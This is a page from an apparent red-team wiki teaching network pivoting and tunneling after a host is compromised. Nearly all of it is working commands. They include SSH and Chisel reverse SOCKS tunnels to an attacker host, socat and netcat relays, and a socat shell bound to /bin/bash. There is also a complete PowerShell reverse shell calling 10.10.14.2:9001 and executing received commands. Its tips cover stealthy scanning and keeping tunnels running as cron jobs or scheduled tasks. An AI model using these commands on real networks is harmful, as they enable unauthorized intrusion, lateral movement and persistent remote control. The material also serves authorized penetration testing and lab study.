Edit

Tunneling And Pivoting

Tunneling & Pivoting Masterclass — The Art of Moving Through Networks

When you’ve compromised a host inside a restricted environment, the external network is no longer your only battlefield — now you must pivot, tunnel, and chain access to reach internal assets. This section covers everything from simple SSH port forwarding to multi-layered SOCKS tunnels using tools like Chisel, SSH, and ProxyChains.

I. 🧩 Core Concepts

Concept
Description

Pivoting

Using one compromised host as a bridge to another internal target.

Tunneling

Forwarding traffic through an encrypted or hidden channel.

Proxying

Routing traffic from one point through another (SOCKS, HTTP).

Port Forwarding

Redirecting traffic from one port/interface to another.

Reverse vs. Bind

Reverse = victim connects to you; Bind = you connect to victim.

II. 🧠 Network Reconnaissance for Pivoting

Before tunneling — map the internal environment.

🔍 Internal Recon Commands

ip a
netstat -tuln
route -n
cat /etc/resolv.conf

Scan internal subnets:

for i in {1..254}; do
  ping -c1 10.10.0.$i | grep "bytes from";
done

Enumerate listening services:

ss -tuln | grep 127.0.0.1

III. ⚙️ SSH-Based Tunneling

🧩 1. Local Port Forwarding

Forward remote service → local port

ssh -L 8080:127.0.0.1:80 user@pivot-host

Now visit http://127.0.0.1:8080 locally to access the remote web server.

🧩 2. Remote Port Forwarding

Expose your local service to the remote host

ssh -R 9001:127.0.0.1:80 user@attacker

The remote system can now access your local port 80 through its 9001.

🧩 3. Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 1080 user@pivot-host

Configure proxychains.conf:

socks5 127.0.0.1 1080

Then:

proxychains nmap -sT -Pn 10.10.0.0/24

IV. ⚒️ Chisel — Lightweight Pivoting Weapon

🧠 1. Setup Listener (Attacker)

chisel server -p 8000 --reverse

💣 2. Connect from Victim

chisel client attacker_ip:8000 R:1080:socks

You now have a SOCKS proxy on 127.0.0.1:1080 to pivot deeper.

🧩 3. Port Forward Example

chisel client attacker_ip:8000 R:8080:127.0.0.1:80

V. 🔁 Socat & Netcat Pivoting

🧰 Port Redirection with Socat

socat TCP-LISTEN:8080,fork TCP:10.10.0.5:80

🔄 Reverse Shell Over HTTP

socat TCP-LISTEN:80,fork EXEC:/bin/bash

🧠 Netcat Relay

mkfifo /tmp/f; nc -lvp 9001 < /tmp/f | nc 10.10.0.5 22 > /tmp/f

VI. 🧰 ProxyChains + Chaining Tunnels

🔹 ProxyChains Config Example

[ProxyList]
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

Use chained proxies:

proxychains nmap -sT 172.16.0.0/24
proxychains firefox http://172.16.0.10

VII. 🔐 SSH Pivot through Multiple Hosts

🧩 Example: Two Internal Hops

ssh -J user@pivot1 user@pivot2

or with dynamic forwarding:

ssh -D 1080 -J user@pivot1 user@pivot2

VIII. 💀 Windows-Side Tunneling

🧠 1. Using Plink (PuTTY Command-Line)

plink.exe -ssh [email protected] -L 8080:127.0.0.1:80 -N

💣 2. Using Netsh

netsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.10.0.5 connectport=80

⚙️ 3. PowerShell Reverse Tunnel

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',9001);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

IX. 🧩 Pivot Automation Example

🔹 Local Enumeration + SOCKS Pivot Script

#!/bin/bash
target=$1
echo "[*] Scanning internal via pivot..."
proxychains nmap -sT -Pn -p 22,80,445,3389 $target

X. 🧠 Advanced Multi-Layer Pivoting

Layer
Tool
Description

1️⃣

SSH -D

First SOCKS tunnel to pivot host

2️⃣

Chisel R:1080:socks

Chain pivot deeper

3️⃣

ProxyChains

Route scanner through both

4️⃣

Metasploit route add

Automate pivot inside sessions

Example:

msf> route add 10.10.0.0 255.255.255.0 1
msf> use auxiliary/scanner/portscan/tcp

XI. ⚔️ Real-World Workflow Example

# 1. Establish foothold
ssh user@pivot1

# 2. Start SOCKS proxy
ssh -D 1080 user@pivot1

# 3. Configure ProxyChains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf

# 4. Scan internal network
proxychains nmap -sT -Pn 10.10.0.0/24

# 5. Deploy Chisel for deeper pivot
chisel server -p 8000 --reverse
chisel client 10.10.14.2:8000 R:1080:socks

XII. 🧠 Pro Tips & Red Team Tricks

Speed vs. Stealth

  • Use -T4 cautiously when scanning via proxychains — slower = stealthier.

  • Compress tunnels with SSH -C for bandwidth-limited pivots.

Combine Layers

  • SOCKS + SSH + Chisel for multi-hop chains.

  • Use proxychains to send Burp Suite, SQLMap, or even Firefox traffic through your tunnels.

Persistence in Tunnels

  • Launch Chisel or SSH tunnels as cron jobs or Windows tasks for stable post-exploitation channels.

Operational Awareness

  • Always map internal subnets before pivoting again.

  • Keep a pivot diagram for tracking chain depth and SOCKS ports.

XIII. 🧩 Quick Reference Table

Goal
Tool / Command

Local Port Forward

ssh -L 8080:127.0.0.1:80 user@pivot

Remote Port Forward

ssh -R 8080:127.0.0.1:80 user@attacker

SOCKS Proxy

ssh -D 1080 user@pivot

Multi-Hop SSH

ssh -J user@pivot1 user@pivot2

Chisel Reverse

chisel client attacker:8000 R:1080:socks

ProxyChains Scan

proxychains nmap -sT -Pn 10.10.0.0/24

Socat Relay

socat TCP-LISTEN:8080,fork TCP:10.10.0.5:80

Windows Port Proxy

netsh interface portproxy add v4tov4 ...

PreviousExfiltration & Data TheftNextPersistence & Lateral Movement

Last updated

Was this helpful?